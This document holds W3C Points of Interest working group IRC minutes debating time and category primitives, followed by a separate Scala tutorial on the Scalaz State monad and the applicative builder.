<danbri> eg scenario: I'm stood in middle of Dam Square, looking (west?) towards the palace, running e.g Layar + a flickr layer. Would it be useful to show only photos that are taken facing that same direction, ie. showing the palace and stuff behind it, ... or also the things behind me (Krasnapolsky hotel...)?
<JonathanJ> geolocation WG have been making the orientation spec. -
matt: I see this:
... but it appears to be just about the image orientation.
... iPhone appears to capture in EXIF the data: "Exif.GPSInfo.GPSImgDirectionRef", from:
-> EXIF 2.2 spec includes GPSImgDirectionRef and GPSImgDirection
<danbri> matt, thanks I'll read
<danbri> i made a test image but maybe i have geo turned off
<scribe> Scribe: cperey
<danbri> matt, re ... how do we go about getting a filetree for a testcases repo?
I'll scribe for an hour
when are we going to finish March 31? at 6 PM
Matt: we are moving the AR vocabulary to the end, in order to begin working on POI core spec page
... is there anything in the Landscape since last time we reviewed the AR landscape?
Alex: what are we going to do? don't want to go through item by item
<matt> Landscape Document
Alex: we should move on
Matt: get into core drafting, do more of this tomorrow when we have a better understanding of what's in/out of the core.
Alex: Or dedicate a future teleconference to it.
<matt> Agenda again
Matt: questions about the core draft
... we should deal with these up front, some we dealt wth yesterday
Ronald: are we trying to split up the work?
... can different people take more focus on specific sections?
Alex: maybe we should take the easier items and get them out of the way
... get the ball rolling with Time and Categorization. It also gives us a process.
Matt: we look at requirements of each primitive
Alex: if we do that as a group, then it's a shorter list
... we have (after Time and Cat) Relationship Primitive-- not something to be done in a smaller group
... then we have location, which is core
Thomas: agree that we need to work together
... Location is low hanging fruit already
Alex: Time establishes the format of what we are going to write
<matt> Core Draft
<danbri> matt can/should I bug sysreq for a poiwg repo? for testcases etc (and specs eventually...)
Alex: we might start with something circumspect
... location can get messy
Ronald: agree that location is pretty complex
Alex: begin with time
<matt> Time primitive
Alex: POI must--> can have a time primitive
... could be time when business is opened and closed
... that is relegated to metadata, not the primary function of POI
... time when this POI was created. This falls in provenance
... time that this thing came into existence.
... it's not obvious that every POI needs to come into existence and left
Thomas: if you say that something exists in this range of time, you are saying that we will move the user forward and backward in time
Alex: Google earth (KML) has a time stamp and time Span
<matt> KML Time primitive
Alex: Time Stamp says when and a date
... Time Span has a beginning and an end
... this is used in Google earth, to slide back in time to see content in past
... that's about the extent that we need to define
Thomas: suggestion that we have one more, ideally, time stamp of the last time the data was updated.
... it is useful for the client to know if they need to download it again or not
Expiration date
Thomas: it is a form of time which is useful
... Modification time
Ronald: might be better to put this in the metadata primitive
<matt> [[what about recurring time sets? (e.g. open hours) or relative times? (a store has open hours relative to the hours of the mall it is in)]]
Alex: this is where the conversation has gotten baroque
... lots of attributes you might want to stamp
... let's say some linked data has a date stamp
Thomas: technical level it is only necessity to have this type of time stamp in the linked data
Alex: how many links are we limiting a POI to?
Thomas: thinking it was One
... if it is more than one, it could be a time stamp per linked data
Alex: we ask for header, pull out o fheader, say no I don't want the data. Ct short the request, inspect the header
Thomas: COLLADA, X3D don't have those types of headers, may be wrong on that
Alex: is that our scope? to provide mechanism for lInk data to provide an expiration data
Ronald: don't think so. I'm not sure it is valuable. Adds too much complexity. In Layar we have.... to all the links (do they all need modification time stamp)
... in our concept they are all linked to the same POI
Thomas: i don't want clients to constantly update/download big files to see if it has been updated recently or not
Matt: HTML has this distinction
... it gets messy
We need a data modification
Ronald: in Layar definition, we have a single modificaation time and that it applies to all the data
Alex: concerned that utility might be limited. People might over-ride it. Head did not really capture what we wanted
Thomas: adamant that either it is possible to do this without time stamp, if it can't be done, it has to be there
... if not possible to do in header, it HAS to be in POI
... this could cause huge problems down the road.
Alex: that's a good argument for time modification time stamp, time span, time of applicability, could have a beginning and end
Matt: when this is being served over HTTP, these headers.... and any other transport mechanism must similarly
<danbri> (ok i've requested a poiwg repo for testcases etc to be added at ... time to read the Mercurial manual...)
Alex: if other POI query other links, they want to be able to send a time stamp to you to relect how recently the underlying digital object has been updated
<matt> matt: Basically, I think we should say "if you are transporting POIs over HTTP, you should be setting these X,Y, Z headers with the appropriate values. Other transport mechanisms should likewise provide such information."
matt: If I got a POI and it indicated that something has been changed, then it is my responsibility to go through and check each and to identify which elements have been updated
Alex: save the consumers of this data having to go through the subsegments and check this "manually"
Jacques: this is a basic feature of collaborative AR
Alex: can you please expand or give an example?
Jacques: for example, for guidance application, someone is outside, blind person, and you are looking in VR on a map, and you want to change some audio POI
... so you need to know when the audio POI can be changed
Alex: there's just me
Jacques: the expert is remote
the person in teh field
Jacques: you can change the content of a POI
Alex: there's a POI, and we want a way to indicate that the user (remote person changed the POI) that the content has changed
the browser needs to know that the content has changed
Alex: the POI has changed, how does the browser find out about it?
Thomas: this is a pull or push thing. This is web page expiration.
... if you are using a different protocol, it is not for us to decide which protocol i sused.
<JonathanJ> I think it seems like POI trigger, or POI pushing
Thomas: any additional downloads are the result, not the ....
Matt: the information about the delivery of the POI goes OUTSIDE of the POI itself
... It's in the envelope
Thomas: if can is virtual. and the person decides to move it. Change the POI location. It would not change the mesh of the can.
... So therefore the client would not be redownloading it, it would download the POI data but not the attached model
Ronald: we are talking aout the modificaiton time
Alex: we have the POI. The model has changed teh same. Location has been updated. Does the POI modification time change?
... the POI is in the local agent. Either I need to poll it or it needs to be pushed to me
Which?
Thomas: you don't need to transmit the update time
... just needs to communicate that the .... has been updated
Alex: look at a POI and knowing when it was updated sounds fine, but...
Thomas: The header may be a way to do this.
... the client may need to check to make sure if it has been updated
Alex: isn't that what happens already?
... in the web browser?
Thomas: the server gives recommendations about when to refresh
Martin: there are metatags
Alex: there's a big image, already local (cache) is it not pretty much the case that you have to tell the browser, hey that changed
... the image doesn't have meta, no header, we don't have a mechanism for that
... that's a problem, but it is not clear that it is our problem (yet)
<martinL> +1 for alex
Thomas: if it can't be done in the header, there's not another solution than to have it in the POI recommendation
Alex: reluctant to shoe horn this into the POI spec
Ronald: do we really want to have changeable mesh models
Thomas: most of these things will be fairly static. Meshes will probably be the same
... update time stamp is a simple solution
Alex: the problem is that it is a Macro, it is global to th POI, but not specific to what part of it changed, so it doesn't really solve the problem
Thomas; you need one orientation per link
Alex: no, I argue that you don't need that
... if there are multiple link, and oriented differently, but the base the frame of reference from which they are, that's what a single orientation accomplishes
... it sets down a frame of reference. It's not the billboarding
... it is that a single point in space... arbirtarily given is not adequate
<Luca> etag or any metatagit's better to understand i something has changed instead of timestamp that can't be unique for all the client
Alex: a discussion about time for POI, needs to be very specific. What is it about POI that need time?
... what is inherent to POI?
<Luca>
Alex: a time that this POI applies, whatever that means, that time period is really the need for the POI
... In agreement that we should at least have that one
... this is where have to decide what we do now. Do we hunt around for time specs?
Thomas: time span.... what time zone is it specified in?
<matt> XML Schema 2 time section
Thomas: do we need to explicitly tell the client the explicity time frame
<matt> KML time primitive
Alex: KML uses time stamp, they use datatypes Second edition
<ahill>
Alex: ISO 8601 convention
... this time stamp assumes UTC. If it is not, you can add + or - something
... that's a reasonable place to go
... does this spec have a beginning and end
... KML has that, is that a wrapper.
Matt: looking at XML schema spec
... they have lower level primitive
... no recurrence
Thomas: suggestion would be that if year is not included it repeats annually
... what about something that repeats weekly? where do you draw the line
Alex: Other people who have sat around tables, have addressed frequency.
<danbri> matt, could you do a quick followup to my sysreq mail saying "agreed - with staff contact hat on" or similar? in case it bounces due to need for officialrequestness
Thomas: what do you mean the time span to mean in terms of repetition
... we are illeminating the possibility of any recurrence?
Alex: no, I don't have a problem with idea of recurrence, but we don't need a time stamp
Thomas: do not specify a year or a day.
Alex: but I don't know it includes something like Friday
Ronald if you goes to GDAY. It is a Gregorian day that recurs
Dan: really wished that we have the use cases
... the use cases is approach that if a user wants
... can we get 5 POI in english
<matt> scribe: matt
danbri: Let's get some use cases
Thomas: 1. A hot dog stand that is occasionally there, but also has open/closed hours.
danbri: What else might you want to know? Health inspections? Kosher?
ahill: Yes, sure, let's throw it into our examples.
Thomas: 2. A historical church that used to exist and is now destroyed.
ahill: 3. A congregation that was at a church for a period of time. The physical building may have it's own POI, but the type of church might only be there for a period of time.
danbri: Maybe people are exploring their roots.
cperey: Maybe a timestamp around when a member of the congregation can be trusted or not.
Thomas: This might be linked data from the POI to the person, rather than inline.
ahill: Agree on that.
... Is a person a POI? It's really hard for me to make a good argument that people are not points of interest.
Ronald: If that cup of coffee is a POI and I'm not, I'll be offended!
[[general agreement]]
cperey: The congregant, the congregation and the space in which they all may be are all distinct.
ahill: In the last f2f the major concern about these things were that if we do this we'll have to describes everything and anything.
martinL: 4. Football stadium that is open on Mondays and sometimes Wednesdays.
Thomas: I think at some level of complexity it becomes a manual process.
<danbri> for recurring events, see
martinL: I wouldn't say we want to get too complex, but we then need to have multiple time elements.
Ronald: If we can multiple POI times then we're there.
cperey: What about a church that adds wings?
Thomas: I'd argue that's a different POI.
martinL: I think it should be one of the examples, you might have one POI with a time slider.
ahill: If I am driving down the street, I see the church, not the sub POIs, the altar, toilet, etc. I'm interested in the church, now and I'm sliding through time and these things become obvious and apparent.
<danbri> ronald, re calendar/rdf stuff also
<danbri> ...and microformat markup for events
Thomas: The specs for times seem pretty good.
ahill: We don't have the spec for it yet from us.
Ronald: If we're talking about existence then a single time span is sufficient. The other use cases where it's opening hours and things that change, then that's different.
cperey: Should it be in the spec?
ahill: In practical use for these things a time span is something you can include then if you don't include it it's right now and permanent.
... If you have one time span, then you could imagine that being a situation where you could see two of them.
... If two time spans get delivered with a POI, there's just two time spans, what would it break? There's not a parent/child relationship.
Thomas: So you'd treat them as an or relationship?
ahill: Talk of "will that hot dog stand be there?" is really about future things and not real time.
Thomas: Do we have a proposed format?
ahill: I think we can look at what's here and figure it out.
cperey: And then apply it to the use cases.
ahill: We're going to have a POI time, we've got a fundamental unit of time. It doesn't describe a duration.
... I think it just says a duration of two hours, rather than a start/end time.
... I think if the spec we looked at had a begin/end time then KML would have used it.
<danbri> re times, for content
[[caldav seems to have a time-range defined]]
cperey: We had a discussion about location changing over time. We talked about having locations good for specific durations.
... The side of the bus is only valid while it's moving through this geo location.
martinL: That would be a property animation?
Thomas: We talked about having an ad appear at this location.
-> W3C Schools (no relation) sample elements for a date range.
<JonathanJ> 1. present condition (periodical) 2. historical condition (duration), 3. acting condition (irregularity)
Ronald: I remember this discussion and don't remember the outcome. Do we store the entire history, or not?
ahill: I think we can say we don't store the history in the POI.
... KML breaks some of these apart too. Not necessarily embedded.
Thomas: Merely having a date span then you have the possibility of history through multiple POIs. Assign them to different dates with same location.
ahill: You can use a POI to do that, or not. Or you could have metadata to do it in one POI. You don't have to use it either way.
Thomas: Then you have to be very precise in the metadata itself. It becomes not metadata but data.
... The metadata should be describing the content, not the content.
<danbri> "The distinction between "data" and "metadata" is not an absolute one; it is a distinction created primarily by a particular application, and many times the same resource will be interpreted in both ways simultaneously."
Thomas: A building that has different shapes at different dates and times.
ahill: This strikes me as different representations.
Thomas: Not really.
<danbri>
<danbri> :)
ahill: The London Bridge is now in Arizona.
... If I remodel my house, it's still my house. Some people are not going to like the idea that it's a different POI.
... If POIs have URIs, then people are going to want to have a stable URI to describe the building.
... Your proposed solution does not solve everything.
Thomas: Yours would have multiple time stamps that seems more complex than new POIs.
matt: I think there are use cases for both. If you want a historical slider, you include multiple time stamps, and if you want a canonical representation of the house now, then you don't put in multiple timestamps.
ahill: Thomas you're also assuming that the model has to be tied to the POI. There could be a separation, could be from a different database, different metadata.
Thomas: They'd be different POIs then.
ahill: I think this is semantics.
danbri: What are we talking about?
ahill: There are two constituencies, one that wants historical and one that wants permanence.
Thomas: If you don't want the history then you could have it be on POI, but if you want history then you want multiple POIs.
<danbri> matt, good question
ahill: There was some convention for mutation of points.
martinL: Essentially we're talking about the visualization changes over time.
... We have the data and the visualizations are different.
Thomas: No. I see this as the same as CSS and HTML. DIfferent things sent to different clients based on specs or whatever criteria.
... If you've got data associated with it, that too is a piece of data.
... My instinct is different POIs with different time spans.
ahill: The spec will let both work.
Thomas: Then you have to be prepared to spec out multiple timespans. Is that ok?
ahill: Yes.
Ronald: Didn't we agree that the history is outside of the spec?
ahill: Yes, but we're using different history means here.
matt: We've been talking about these primitives as a building block that can be used in different ways.
ahill: So we've been saying that the POI might have a time and the location may have a time.
... It's a bit of a can of worms.
-> GML begin/end
<ahill>
ahill: If in the end we get something that's very close to GML, I think that's OK.
... This could be very similar to what we did with KHARML and KML. We had things we needed to add.
PROPOSED RESOLUTION: The world is complicated.
<JonathanJ> +1
+1
<danbri> oh, 'Profiling GML for RSS/Atom, RDF and Web developers' finally relevant ;)
-> GML subset tools
<scribe> scribe: Ronald
<danbri> discussing ... GML subset tool
ahill: we need to move on, but we also need to capture our discussion
... are the notes ok, or do we need to write the document
martin: we might be able to make focus groups to write it out
matt: we might not have to do it today, but I like the fact of teaming up people
martin: I volunteer for the timespan
thomas: I can help
<matt> ACTION: martinL to work on time spans with Thomas [recorded in]
<trackbot> Sorry, couldn't find user - martinL
<matt> ACTION: martin to work on time spans with Thomas [recorded in]
<trackbot> Created ACTION-43 - Work on time spans with Thomas [on Martin Lechner - due 2011-04-06].
ahill: I remember that someone said openstreetmap has a time definition as well
jacques: for opening hours for shopping centers, not XML, but in text
... it is very easy and compact
luca: we should prepare some use case to define the timestamp to check whether each language is good or not
... for example, for movie show times, we need to decide what is in scope or out of scope
ahill: talking to dan and we were looking into creating some examples in mercurial
<matt> ACTION: Alex to place some examples in mercurial [recorded in]
<trackbot> Created ACTION-44 - Place some examples in mercurial [on Alex Hill - due 2011-04-06].
luca: my question was because the discussion was very wide regarding the POI we can describe, but we should start with something easy to get started
... and maybe in the second draft add other use cases
<danbri> we have to start simple for starters, maybe with a bias towards re-using nearby related specs (like icalendar)
luca: this can be applied to any primitive. Just to move forward and make decisions
matt: thinking of creating an issue for time and spans
<matt> POI tracker
ronald: but are all the primitives issues?
matt: yes, we should be closing them one by one
<Luca> icalendar
<matt> some notes on time primitive
matt: where do we want to gather requirements for the time primitive?
<danbri> (re terminology: icalendar is the ietf data format spec; caldev is a web-dav based protocol for managing a calendar, ... and 'ical' used to be a nickname for it, until Apple named their icalendar-compatible app 'ical' too)
<JonathanJ> icalendar spec -
thomas: we also need to pick a name for the field. 'time' or 'timerange'
ahill: if anyone else already has a spec for time, what do we do with it. Reuse it directly, or renaming things and embed it in our spec?
thomas: we can include it. I don't think it is copyrighted
ahill: but things are namespaces. Are we ok to combining different kinds of namespaces?
<matt> trackbot, close action-3232
<trackbot> Sorry... closing ACTION-3232 failed, please let sysreq know about it
<matt> trackbot, close action-32
<trackbot> ACTION-32 Invite Henning after Matt has put ID requirements in the wiki closed
bertine: we need to be careful there is not any slight difference in meaning
thomas: we should not make something different, just to make something different
ahill: GML, KML refer to ISO for timestamps, but it is a more fundamental concept
... in KML, there is a time primitive, which is an abstract class of which timestamp and timespan extend
thomas: does their timespan combine two time primitives?
ahill: in their context not really
martin: what would be the desired outcome of a focus group
matt: for editorial stuff, I am going to be a gatekeeper
... we will propose text on the mailing list, and I will put it in the wiki
... please include the text ISSUE-7 in the subject or body of the message for tracking
martin: ISSUE-7 or ACTION-43
matt: there are multiple actions to an issue, so discussion on the issue without closing an action
thomas: are we ready to move to the next item
alex: let's talk about categories
<matt> Category Primitive
christine: we talked about categories before, and the general thinking was
cperey: IETF and ? have done a lot of work on documenting not just places of interest
... they have their own structure for categories
... governments and international bodies have their own category systems, hierarchical systems, beautiful systems
<ahill>
cperey: it is unlikely that we as an organization pick one system
... we are insufficient domain experts
... there are experts out there, but not at our table. Henning has not replied and does not seem interested
thomas: is category going to be a required field
ahill: no
... it is not required, but in most cases it is valueable
<matt> PROPOSED RESOLUTION: Category primitive is NOT required
ahill: I can imagine a character string "category", but it is not going to solve the problem. For example we might need to support multiple categories
... we might need to make our own category, and people can choose to ignore
cperey: but it is better to reuse existing category systems
thomas: it could just be a link
cperey: exactly
thomas: a POI needs to be able to have multiple categories and these categories should be URIs
<matt> PROPOSED RESOLUTION: Category primitive is NOT required. Category can be identified by a URI. POIs can have more than one category.
cperey: if we just specify it this way, we don't need to invite an expert to come talk to us... it is an implementation detail
ahill: at some stage we need to work out the meaning
<matt> Good Relations categories
thomas: there are also simple formatting issues, e.g. comma seperated list or multiple entries
ahill: how about an action item of finding an example of a system using different category systems
<danbri>
thomas: we should just focus on allowing linking, and not go into the meaning. that is up to the systems
<danbri> hot dog stand:
matt: can you walk me through the bestbuy example
<matt> [[<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" ""><html xmlns=""
danbri: it is a particular store, if you view source and search for "property="
<matt> xmlns:rdfs=""
<matt> xmlns:dc=""
<matt> xmlns:xsd=""
<matt> xmlns:foaf=""
<matt> xmlns:gr=""
<matt> xmlns:geo=""
<matt> xmlns:v=""
danbri: you find lat lon, twitter account
<matt> xmlns:<head profile=""><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /]]
danbri: they also have it on products they sell
ahill: should we go to a product page
danbri: would not bother now, but we can expect that data to be on the web and there should be links from the POI information
<matt> [[<div class="column right"><div class="hours" rel="gr:hasOpeningHoursSpecification"><h3>Store Hours</h3><ul><li class="day0" typeof="gr:OpeningHoursSpecification" about="#storehours_sun"> <span rel="gr:hasOpeningHoursDayOfWeek" resource="" class="day">Sun</span>]]
ahill: I want to look at an implementation that uses categories
matt: I see they are using opening hours from the good relations
thomas: but we are not looking at opening hours yet from the time primitive
<ahill>
ahill: when I went here, the website shows a category, but in the source I can't see any link to categories
... I need an example. I have the feeling we need a dictionary or a schema to define what the category is and where it is in the category hierarchy
<matt> [[I suggest we install the RDFa bookmarklet and use that instead of view source: ]]
danbri: library classification schemes don't work that well as category scheme
... it is not really a thing in a category. it is a bit fuzzy
... it is thesaurus type stuff
... scos
<danbri>
<matt> Best Buy example
danbri: if the POI is art related, the category will be using skos
<JonathanJ> +1
<danbri>
danbri: if it is representing things, rdf uses different mechanics
<danbri>
<danbri>
<bertine>
<matt> scribe: matt
danbri: The resource itself is:
... But the page is
<scribe> scribe: Ronald
danbri: yaga is a organization on top of wikipedia
... is explaining dbpedia
thomas: is a broader term a parent type?
danbri: it is not really hierarchical
cperey: librarians have their own standardisation systems
<danbri>
<danbri>
<danbri> a smooth-textured sausage of minced beef or pork usually smoked; often served on a bread roll ('en' language string)
<matt> Linked Data Cloud diagram
<danbri>
danbri: most of the data sets are sturctured similarly
<danbri>
danbri: we don't need to choose
<danbri> try sindice.com
<danbri>
<cperey> NFAIS Standards
<cperey>
thomas: can I ask yahoo for green fruit. the linked data is not really used fully yet
<danbri>
ahill: until I feel that google is doing something other than proprietary mapping, I did not think the web is linked
matt: we are talking about categorization, right?
<matt> categorization primitive
thomas: there is potentially infinite categories, so using URIs seems a reasonable solution
<matt> Thread on cat primitive
<danbri> (you can probly use to define a query for green fruit)
thomas: do we need to create an action point to decide what form to use.
ahill: if someone else has figured out time, and someone else categories... do we add a wrapper around it or recommend to use these specs
... do we need a wrapper that says this is a POI
<matt> Karl's document on categories
ahill: is it some sort of key-value pair?
thomas: there needs to be an identifying string saying this is a POI
... it may be the nature of the transmission that assumes it is a POI, but it depends on how it is used
... if an AR browser gets information from a server, it can assume it is a POI, but if it is on the web, we need to know it is a POI
<matt> [[This category description does not replace existing industry classification models, rather it enables reference to such standards and local domain derivations from such standards as:...]] -- Karl's document
<danbri> proposal: "The WG agrees that integra
<danbri> tes existing deployed practice, as well as describing how to use Linked Data (skos, dbpedia etc.) for such tasks.
ahill: if all we end up with is a bunch of existing standards, do we need to invent something around it
thomas: do we need a version of it, or is it implicit?
<JonathanJ> +1
thomas: do we include the fact that a POI can have more than one category?
danbri: I see that as something implicit
cperey: does this mean that we do not need a core primitive?
<matt> PROPOSED practic
<matt> well as describing how to use Linked Data (skos, dbpedia etc.) for such tasks.
ahill: we may not need to have a structure
cperey: how do we decide it is expressed like that?
ahill: by convention
cperey: is there an action to decide what the convention is?
<danbri> I could write <dbpedia:HotDogStand ...
<matt> practice, as wel
<matt> describing how to use Linked Data (skos, dbpedia etc.) for such tasks.
matt: let's go back to an earlier resolution that I wrote a while ago
<matt> RESOLUTION: Category primitive is not required.
danbri: if a POI is a category, it is a boring category. so category is optional
<jacques> amenitie=stand cuisine=hotdog in OSM
<matt> Karl's doc
matt: let's look at the examples
... using URIs makes it easy to refer to categories from dbpedia
cperey: the proposal says one or more, but we just backed of and said none required
... we could have one... a useless one
danbri: that would be just "POI"
cperey: not sure what is the right way of treating it
martin: if you don't want to specify, you should be able to leave i
|
http://www.w3.org/2011/03/30-poiwg-minutes.html
|
CC-MAIN-2015-14
|
refinedweb
| 12,674
| 71.85
|
>>> On 31.10.18 at 10:27, <Paul.Durrant@xxxxxxxxxx> wrote:
>> From: Roger Pau Monne
>> Sent: 31 October 2018 08:54
>>
>> On Tue, Oct 30, 2018 at 05:11:30PM +0000, Paul Durrant wrote:
>> > > From: Roger Pau Monne
>> > > Sent: 30 October 2018 17:09
>> > >
>> > > On Mon, Oct 29, 2018 at 06:02:10PM +0000, Paul Durrant wrote:
>> > > > ---.
I'm afraid I disagree with this view of yours: A field of the form
"uint32_t x:1" does not reserve the following 31 bits. That's in
part because types other than plain, signed, or unsigned int as
well as bool aren't allowed by the base C standard anyway for
bit fields; allowing them is a (quite common) compiler extension
(and there are actually quirks when it comes to using types
wider than int, but a bit count not specifying more bits than an
int can hold). Just look at the resulting code of this example:
#include <stddef.h>
#include <stdint.h>
struct s {
uint32_t x:1;
char c;
};
unsigned test(void) {
return offsetof(struct s,.
|
https://lists.xenproject.org/archives/html/xen-devel/2018-10/msg02569.html
|
CC-MAIN-2021-39
|
refinedweb
| 175
| 74.42
|
I'm developing a game using OpenGL and have run into a strange issue. Exactly 30 seconds after creating a context, the frame time increases by 2 - 3x depending on the scene, and then remains constant. I am using query objects with GL_TIME_ELAPSED to get the frame time. Below is a small demo that demonstrates the issue.
I know I shouldn't be using glBegin/glEnd, my actual game uses vertex buffers and the issue is exactly the same. I've also tried using GLFW, but the exact same thing happened.I know I shouldn't be using glBegin/glEnd, my actual game uses vertex buffers and the issue is exactly the same. I've also tried using GLFW, but the exact same thing happened.Code :
#include <stdio.h> #include <GL/glew.h> #include <GL/freeglut.h> int main(int argc, char** argv) { glutInit(&argc, argv); glutInitDisplayMode(GLUT_RGB | GLUT_DOUBLE); glutCreateWindow("Frame time test"); glewExperimental = GL_TRUE; glewInit(); GLuint query; glGenQueries(1, &query); while(1) { glClear(GL_COLOR_BUFFER_BIT); glBeginQuery(GL_TIME_ELAPSED, query); glBegin(GL_TRIANGLES); glVertex3f(-1, -1, 0); glVertex3f(1, -1, 0); glVertex3f(0, 1, 0); glEnd(); glEndQuery(GL_TIME_ELAPSED); GLuint drawTime; glGetQueryObjectuiv(query, GL_QUERY_RESULT, &drawTime); char timeStr[32]; sprintf(timeStr, "%f", drawTime / 1000000.0f); glutSetWindowTitle(timeStr); glutSwapBuffers(); glutMainLoopEvent(); } return 0; }
Is there something I'm doing wrong, or is this a driver bug? I've been doing OpenGL development for quite a while and have never seen this before.
I'm on Linux with a NVIDIA GTX 560 Ti that has the latest drivers (310.19).
|
https://www.opengl.org/discussion_boards/printthread.php?t=179686&pp=10&page=1
|
CC-MAIN-2015-18
|
refinedweb
| 252
| 56.86
|
Post your Comment
The package keyword
The package keyword
The package in java programming language
is a keyword that is used to define a package that includes the java classes. Keywords
are basically reserved words
package:
in a package world. The we specify the keyword package with the name of the package.
package world;
public class HelloWorld {
public static void main(String... package: i hv created created a package and save it into D
Create Your Own Package
Create Your Own Package
The package to which the source file belongs is specified with the keyword
package at the top left of the source file, before the code
Private Java Keyword
members is
package access.
Using a private Keyword within a
class...
Private Java Keyword
private is a keyword defined in the java programming
language. Keywords
Public Java Keyword
Public Java Keyword
public is a
keyword defined in the java programming language. Keywords...
programming language likewise the public keyword indicates the
following :
Protected Java Keyword
Protected Java Keyword
protected is a keyword defined in the java programming
language. Keywords... in java programming language likewise the protected
keyword indicates
The double Keyword
The
double Keyword
The
double is a Java keyword that may not
be used as identifiers i.e. you... with the double data type is called Double
that is defined in java.lang package.
To
declare import keyword
The import keyword
The import statement make available one or all the
classes in a package... specific meaning relevant to a compiler.
Once a package in a java source
file
Java package,Java Packages
belongs is specified with the keyword package at the top left of the source file...
Java Package
Introduction to Java Package
A Java package is a mechanism for organizing a group
Java package
Java package
Introduction to Java Package
Package is a mechanism for organizing a group... and category.
An example of package is the JDK package of SUN Java as shown
Local Variable ,Package & import
& import
The Package Keyword
Create Your Own Package...Local Variable ,Package & import
A local variable has a local scope.Such...;
System.out.print(classVariable);
}
}
Package & import
Java classes can
How to import a package
How to import a package
... in package.
Declaring the fully-qualified class name. For
example...();
Using an "import"
keyword: For example
Creating your own package in java
The package to which the source file belongs is specified with the keyword
package at the top left of the source file, before the code that defines the
real classes in the package.
To know more about how to create own package
Keyword - this
Keyword - this
A keyword is a word having a particular meaning to the programming
language. Similarly, this keyword is used to represent an object constructed
from a class
What is this keyword?
What is this keyword? What is this keyword
Using throw keyword in exception handling in Core Java
Description:
Core Java Throw Function is used for throwing the exception. The throw keyword tells the compiler that it will be handled by calling a method... Handling:
package exceptionh;
import java.io.*;
class ExcepHandling1
Post your Comment
|
http://www.roseindia.net/discussion/24427-The-package-keyword.html
|
CC-MAIN-2014-15
|
refinedweb
| 519
| 52.39
|
learning Scalaz: day 7
Hey there. There's an updated html5 book version, if you want.
On day 6 we reviewed
for syntax and checked out the
Writer monad and the reader monad, which is basically using functions as monads.
Applicative Builder
One thing I snuck in while covering the reader monad is the Applicative builder
|@|. On day 2 we introduced
^(f1, f2) {...} style that was introduced in 7.0.0-M3, but that does not seem to work for functions or any type constructor with two parameters.
The discussion on the Scalaz mailing list seems to suggest that
|@| will be undeprecated, so that's the style we will be using, which looks like this:
scala> (3.some |@| 5.some) {_ + _} res18: Option[Int] = Some(8) scala> val f = ({(_: Int) * 2} |@| {(_: Int) + 10}) {_ + _} f: Int => Int = <function1>
Tasteful stateful computations
Learn You a Haskell for Great Good says:
Haskell features a thing called the state monad, which makes dealing with stateful problems a breeze while still keeping everything nice and pure.
Let's implement the stack example. This time I am going to translate Haskell into Scala without making it into case class:
scala> type Stack = List[Int] defined type alias Stack scala> def pop(stack: Stack): (Int, Stack) = stack match { case x :: xs => (x, xs) } pop: (stack: Stack)(Int, Stack) scala> def push(a: Int, stack: Stack): (Unit, Stack) = ((), a :: stack) push: (a: Int, stack: Stack)(Unit, Stack) scala> def stackManip(stack: Stack): (Int, Stack) = { val (_, newStack1) = push(3, stack) val (a, newStack2) = pop(newStack1) pop(newStack2) } stackManip: (stack: Stack)(Int, Stack) scala> stackManip(List(5, 8, 2, 1)) res0: (Int, Stack) = (5,List(8, 2, 1))
State and StateT
LYAHFGG:
We'll say that a stateful computation is a function that takes some state and returns a value along with some new state. That function would have the following type:
s -> (a, s)
The important thing to note is that unlike the general monads we've seen,
State specifically wraps functions. Let's look at
State's definition in Scalaz:
type State[S, +A] = StateT[Id, S, A] // important to define here, rather than at the top-level, to avoid Scala 2.9.2 bug object State extends StateFunctions { def apply[S, A](f: S => (S, A)): State[S, A] = new StateT[Id, S, A] { def apply(s: S) = f(s) } }
As with
Writer,
State[S, +A] is a type alias of
StateT[Id, S, A]. Here's the simplified version of
StateT:
trait StateT[F[+_], S, +A] { self => /** Run and return the final value and state in the context of `F` */ def apply(initial: S): F[(S, A)] /** An alias for `apply` */ def run(initial: S): F[(S, A)] = apply(initial) /** Calls `run` using `Monoid[S].zero` as the initial state */ def runZero(implicit S: Monoid[S]): F[(S, A)] = run(S.zero) }
We can construct a new state using
State singleton:
scala> State[List[Int], Int] { case x :: xs => (xs, x) } res1: scalaz.State[List[Int],Int] = scalaz.package$State$$anon$1@19f58949
Let's try implementing the stack using
State:
scala> type Stack = List[Int] defined type alias Stack scala> val pop = State[Stack, Int] { case x :: xs => (xs, x) } pop: scalaz.State[Stack,Int] scala> def push(a: Int) = State[Stack, Unit] { case xs => (a :: xs, ()) } push: (a: Int)scalaz.State[Stack,Unit] scala> def stackManip: State[Stack, Int] = for { _ <- push(3) a <- pop b <- pop } yield(b) stackManip: scalaz.State[Stack,Int] scala> stackManip(List(5, 8, 2, 1)) res2: (Stack, Int) = (List(8, 2, 1),5)
Using
State[List[Int], Int] {...} we were able to abstract out the "extract state, and return value with a state" portion of the code. The powerful part is the fact that we can monadically chain each operations using
for syntax without manually passing around the
Stack values as demonstrated in
stackManip above.
Getting and setting state
LYAHFGG:
The
Control.Monad.Statemodule provides a type class that's called
MonadStateand it features two pretty useful functions, namely
getand
put.
The
State object extends
StateFunctions trait, which defines a few helper functions:
trait StateFunctions { def constantState[S, A](a: A, s: => S): State[S, A] = State((_: S) => (s, a)) def state[S, A](a: A): State[S, A] = State((_ : S, a)) def init[S]: State[S, S] = State(s => (s, s)) def get[S]: State[S, S] = init def gets[S, T](f: S => T): State[S, T] = State(s => (s, f(s))) def put[S](s: S): State[S, Unit] = State(_ => (s, ())) def modify[S](f: S => S): State[S, Unit] = State(s => { val r = f(s); (r, ()) }) /** * Computes the difference between the current and previous values of `a` */ def delta[A](a: A)(implicit A: Group[A]): State[A, A] = State{ (prevA) => val diff = A.minus(a, prevA) (diff, a) } }
These are confusing at first. But remember
State monad encapsulates functions that takes a state and returns a pair of a value and a state. So
get in the context of state simply means to retreive the state into the value:
def init[S]: State[S, S] = State(s => (s, s)) def get[S]: State[S, S] = init
And
put in this context means to put some value into the state:
def put[S](s: S): State[S, Unit] = State(_ => (s, ()))
To illustrate this point, let's implement
stackyStack function.
scala> def stackyStack: State[Stack, Unit] = for { stackNow <- get r <- if (stackNow === List(1, 2, 3)) put(List(8, 3, 1)) else put(List(9, 2, 1)) } yield r stackyStack: scalaz.State[Stack,Unit] scala> stackyStack(List(1, 2, 3)) res4: (Stack, Unit) = (List(8, 3, 1),())
We can also implement
pop and
push in terms of
get and
put:
